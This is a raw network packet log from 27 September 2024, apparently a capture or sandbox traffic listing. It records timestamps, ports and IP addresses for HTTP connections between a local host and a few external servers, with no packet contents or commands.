Sep 27, 2024 04:21:17.256881952 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.256906033 CEST	49722	80	192.168.2.5	185.215.113.17
Sep 27, 2024 04:21:17.256906033 CEST	49722	80	192.168.2.5	185.215.113.17
Sep 27, 2024 04:21:17.256912947 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.256948948 CEST	49722	80	192.168.2.5	185.215.113.17
Sep 27, 2024 04:21:17.256948948 CEST	49722	80	192.168.2.5	185.215.113.17
Sep 27, 2024 04:21:17.257677078 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.257688046 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.257698059 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.257740021 CEST	49722	80	192.168.2.5	185.215.113.17
Sep 27, 2024 04:21:17.257741928 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.257752895 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.257759094 CEST	49722	80	192.168.2.5	185.215.113.17
Sep 27, 2024 04:21:17.257764101 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.257775068 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.257797956 CEST	49722	80	192.168.2.5	185.215.113.17
Sep 27, 2024 04:21:17.257812977 CEST	49722	80	192.168.2.5	185.215.113.17
Sep 27, 2024 04:21:17.257822990 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.258634090 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.258645058 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.258655071 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.258676052 CEST	49722	80	192.168.2.5	185.215.113.17
Sep 27, 2024 04:21:17.258676052 CEST	49722	80	192.168.2.5	185.215.113.17
Sep 27, 2024 04:21:17.258680105 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.258691072 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.258701086 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.258727074 CEST	49722	80	192.168.2.5	185.215.113.17
Sep 27, 2024 04:21:17.258727074 CEST	49722	80	192.168.2.5	185.215.113.17
Sep 27, 2024 04:21:17.259073973 CEST	49722	80	192.168.2.5	185.215.113.17
Sep 27, 2024 04:21:17.261439085 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.261492968 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:17.261533976 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.261543989 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.261554956 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.261567116 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.261575937 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.261583090 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:17.261593103 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.261600971 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:17.261605978 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.261631966 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:17.261647940 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:17.263283968 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.263295889 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.263304949 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.263322115 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.263333082 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.263336897 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.263344049 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.263355970 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.263364077 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.263381004 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.263403893 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.265563011 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.265573978 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.265583992 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.265607119 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.265615940 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.265623093 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.265633106 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.265642881 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.265645027 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.265655994 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.265680075 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.265696049 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.269849062 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.269859076 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.269875050 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.269891024 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.269906998 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.269913912 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.269920111 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.269932032 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.269932985 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.269942999 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.269968033 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.269985914 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.270335913 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.270375013 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.270400047 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.270411015 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.270437002 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.270462036 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.270472050 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.270482063 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.270498037 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.270509958 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.270519018 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.270548105 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.270572901 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.271584034 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.271600008 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.271610022 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.271625042 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.271635056 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.271635056 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.271646976 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.271656036 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.271665096 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.271668911 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.271687031 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.271703005 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.272222042 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.272260904 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.272284031 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.272294044 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.272304058 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.272315025 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.272321939 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.272327900 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.272339106 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.272341013 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.272355080 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.272381067 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.272511959 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.272522926 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.272531986 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.272550106 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.272562981 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.272566080 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.272574902 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.272597075 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.272614002 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.272654057 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.272664070 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.272674084 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.272687912 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.272707939 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.272730112 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.272741079 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.272753000 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.272762060 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.272764921 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.272793055 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.272830963 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.272840977 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.272850990 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.272861958 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.272864103 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.272875071 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.272887945 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.272912025 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.273432016 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.273472071 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.273477077 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.273488045 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.273510933 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.273528099 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.273545980 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.273555994 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.273566008 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.273576021 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.273581028 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.273598909 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.273622990 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.273653984 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.273664951 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.273674011 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.273684978 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.273694992 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.273694992 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.273714066 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.273725033 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.273737907 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.273746014 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.273761988 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.273766994 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.273788929 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.273803949 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.277513027 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.277523994 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.277534008 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.277554989 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.277565002 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.277575970 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.277580976 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:17.277589083 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.277599096 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.277630091 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:17.277647972 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:17.494772911 CEST	49719	45580	192.168.2.5	65.21.18.51
Sep 27, 2024 04:21:17.498924971 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.498941898 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.498953104 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.498980999 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.498991966 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.499001980 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.499002934 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.499017000 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.499030113 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.499052048 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.499082088 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.499176979 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.499187946 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.499200106 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.499238014 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.499239922 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.499249935 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.499259949 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.499262094 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.499274015 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.499285936 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.499296904 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.499301910 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.499309063 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.499351978 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.499526978 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.499543905 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.499555111 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.499566078 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.499572039 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.499579906 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.499591112 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.499602079 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.499608994 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.499613047 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.499625921 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.499638081 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.499650002 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.499650955 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.499661922 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.499672890 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.499684095 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.499682903 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.499696970 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.499701977 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:17.499718904 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.499720097 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:17.499749899 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:17.499789000 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:17.499954939 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.499965906 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.499977112 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.499986887 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.499999046 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.500009060 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.500015974 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:17.500020981 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.500031948 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.500042915 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.500053883 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.500056028 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:17.500082016 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:17.500082970 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.500097036 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.500107050 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:17.500108957 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.500121117 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.500133038 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.500142097 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:17.500144005 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.500155926 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.500166893 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.500178099 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.500180006 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:17.500190973 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.500206947 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.500214100 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:17.500219107 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.500227928 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:17.500232935 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.500248909 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.500257015 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:17.500261068 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.500277042 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.500288010 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.500293016 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:17.500300884 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.500312090 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.500322104 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.500332117 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:17.500334978 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.500348091 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.500355959 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:17.500360012 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.500372887 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.500381947 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:17.500401020 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:17.500435114 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:17.500984907 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.501002073 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.501013994 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.501024008 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.501034021 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.501044035 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.501045942 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:17.501056910 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.501068115 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.501079082 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.501089096 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.501097918 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.501097918 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:17.501111031 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.501123905 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:17.501128912 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.501141071 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.501152992 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.501161098 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:17.501163960 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.501174927 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.501184940 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.501189947 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:17.501199007 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.501210928 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.501221895 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.501231909 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.501233101 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:17.501243114 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.501255035 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.501262903 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:17.501265049 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.501276970 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.501286983 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:17.501291037 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.501303911 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.501310110 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:17.501313925 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.501327038 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.501331091 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:17.501337051 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.501351118 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.501362085 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.501374006 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.501374006 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:17.501384020 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.501394987 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.501405954 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.501415014 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:17.501436949 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:17.501470089 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:17.501765013 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.501777887 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.501787901 CEST	80	49724	176.113.115.95	192.168.2.5
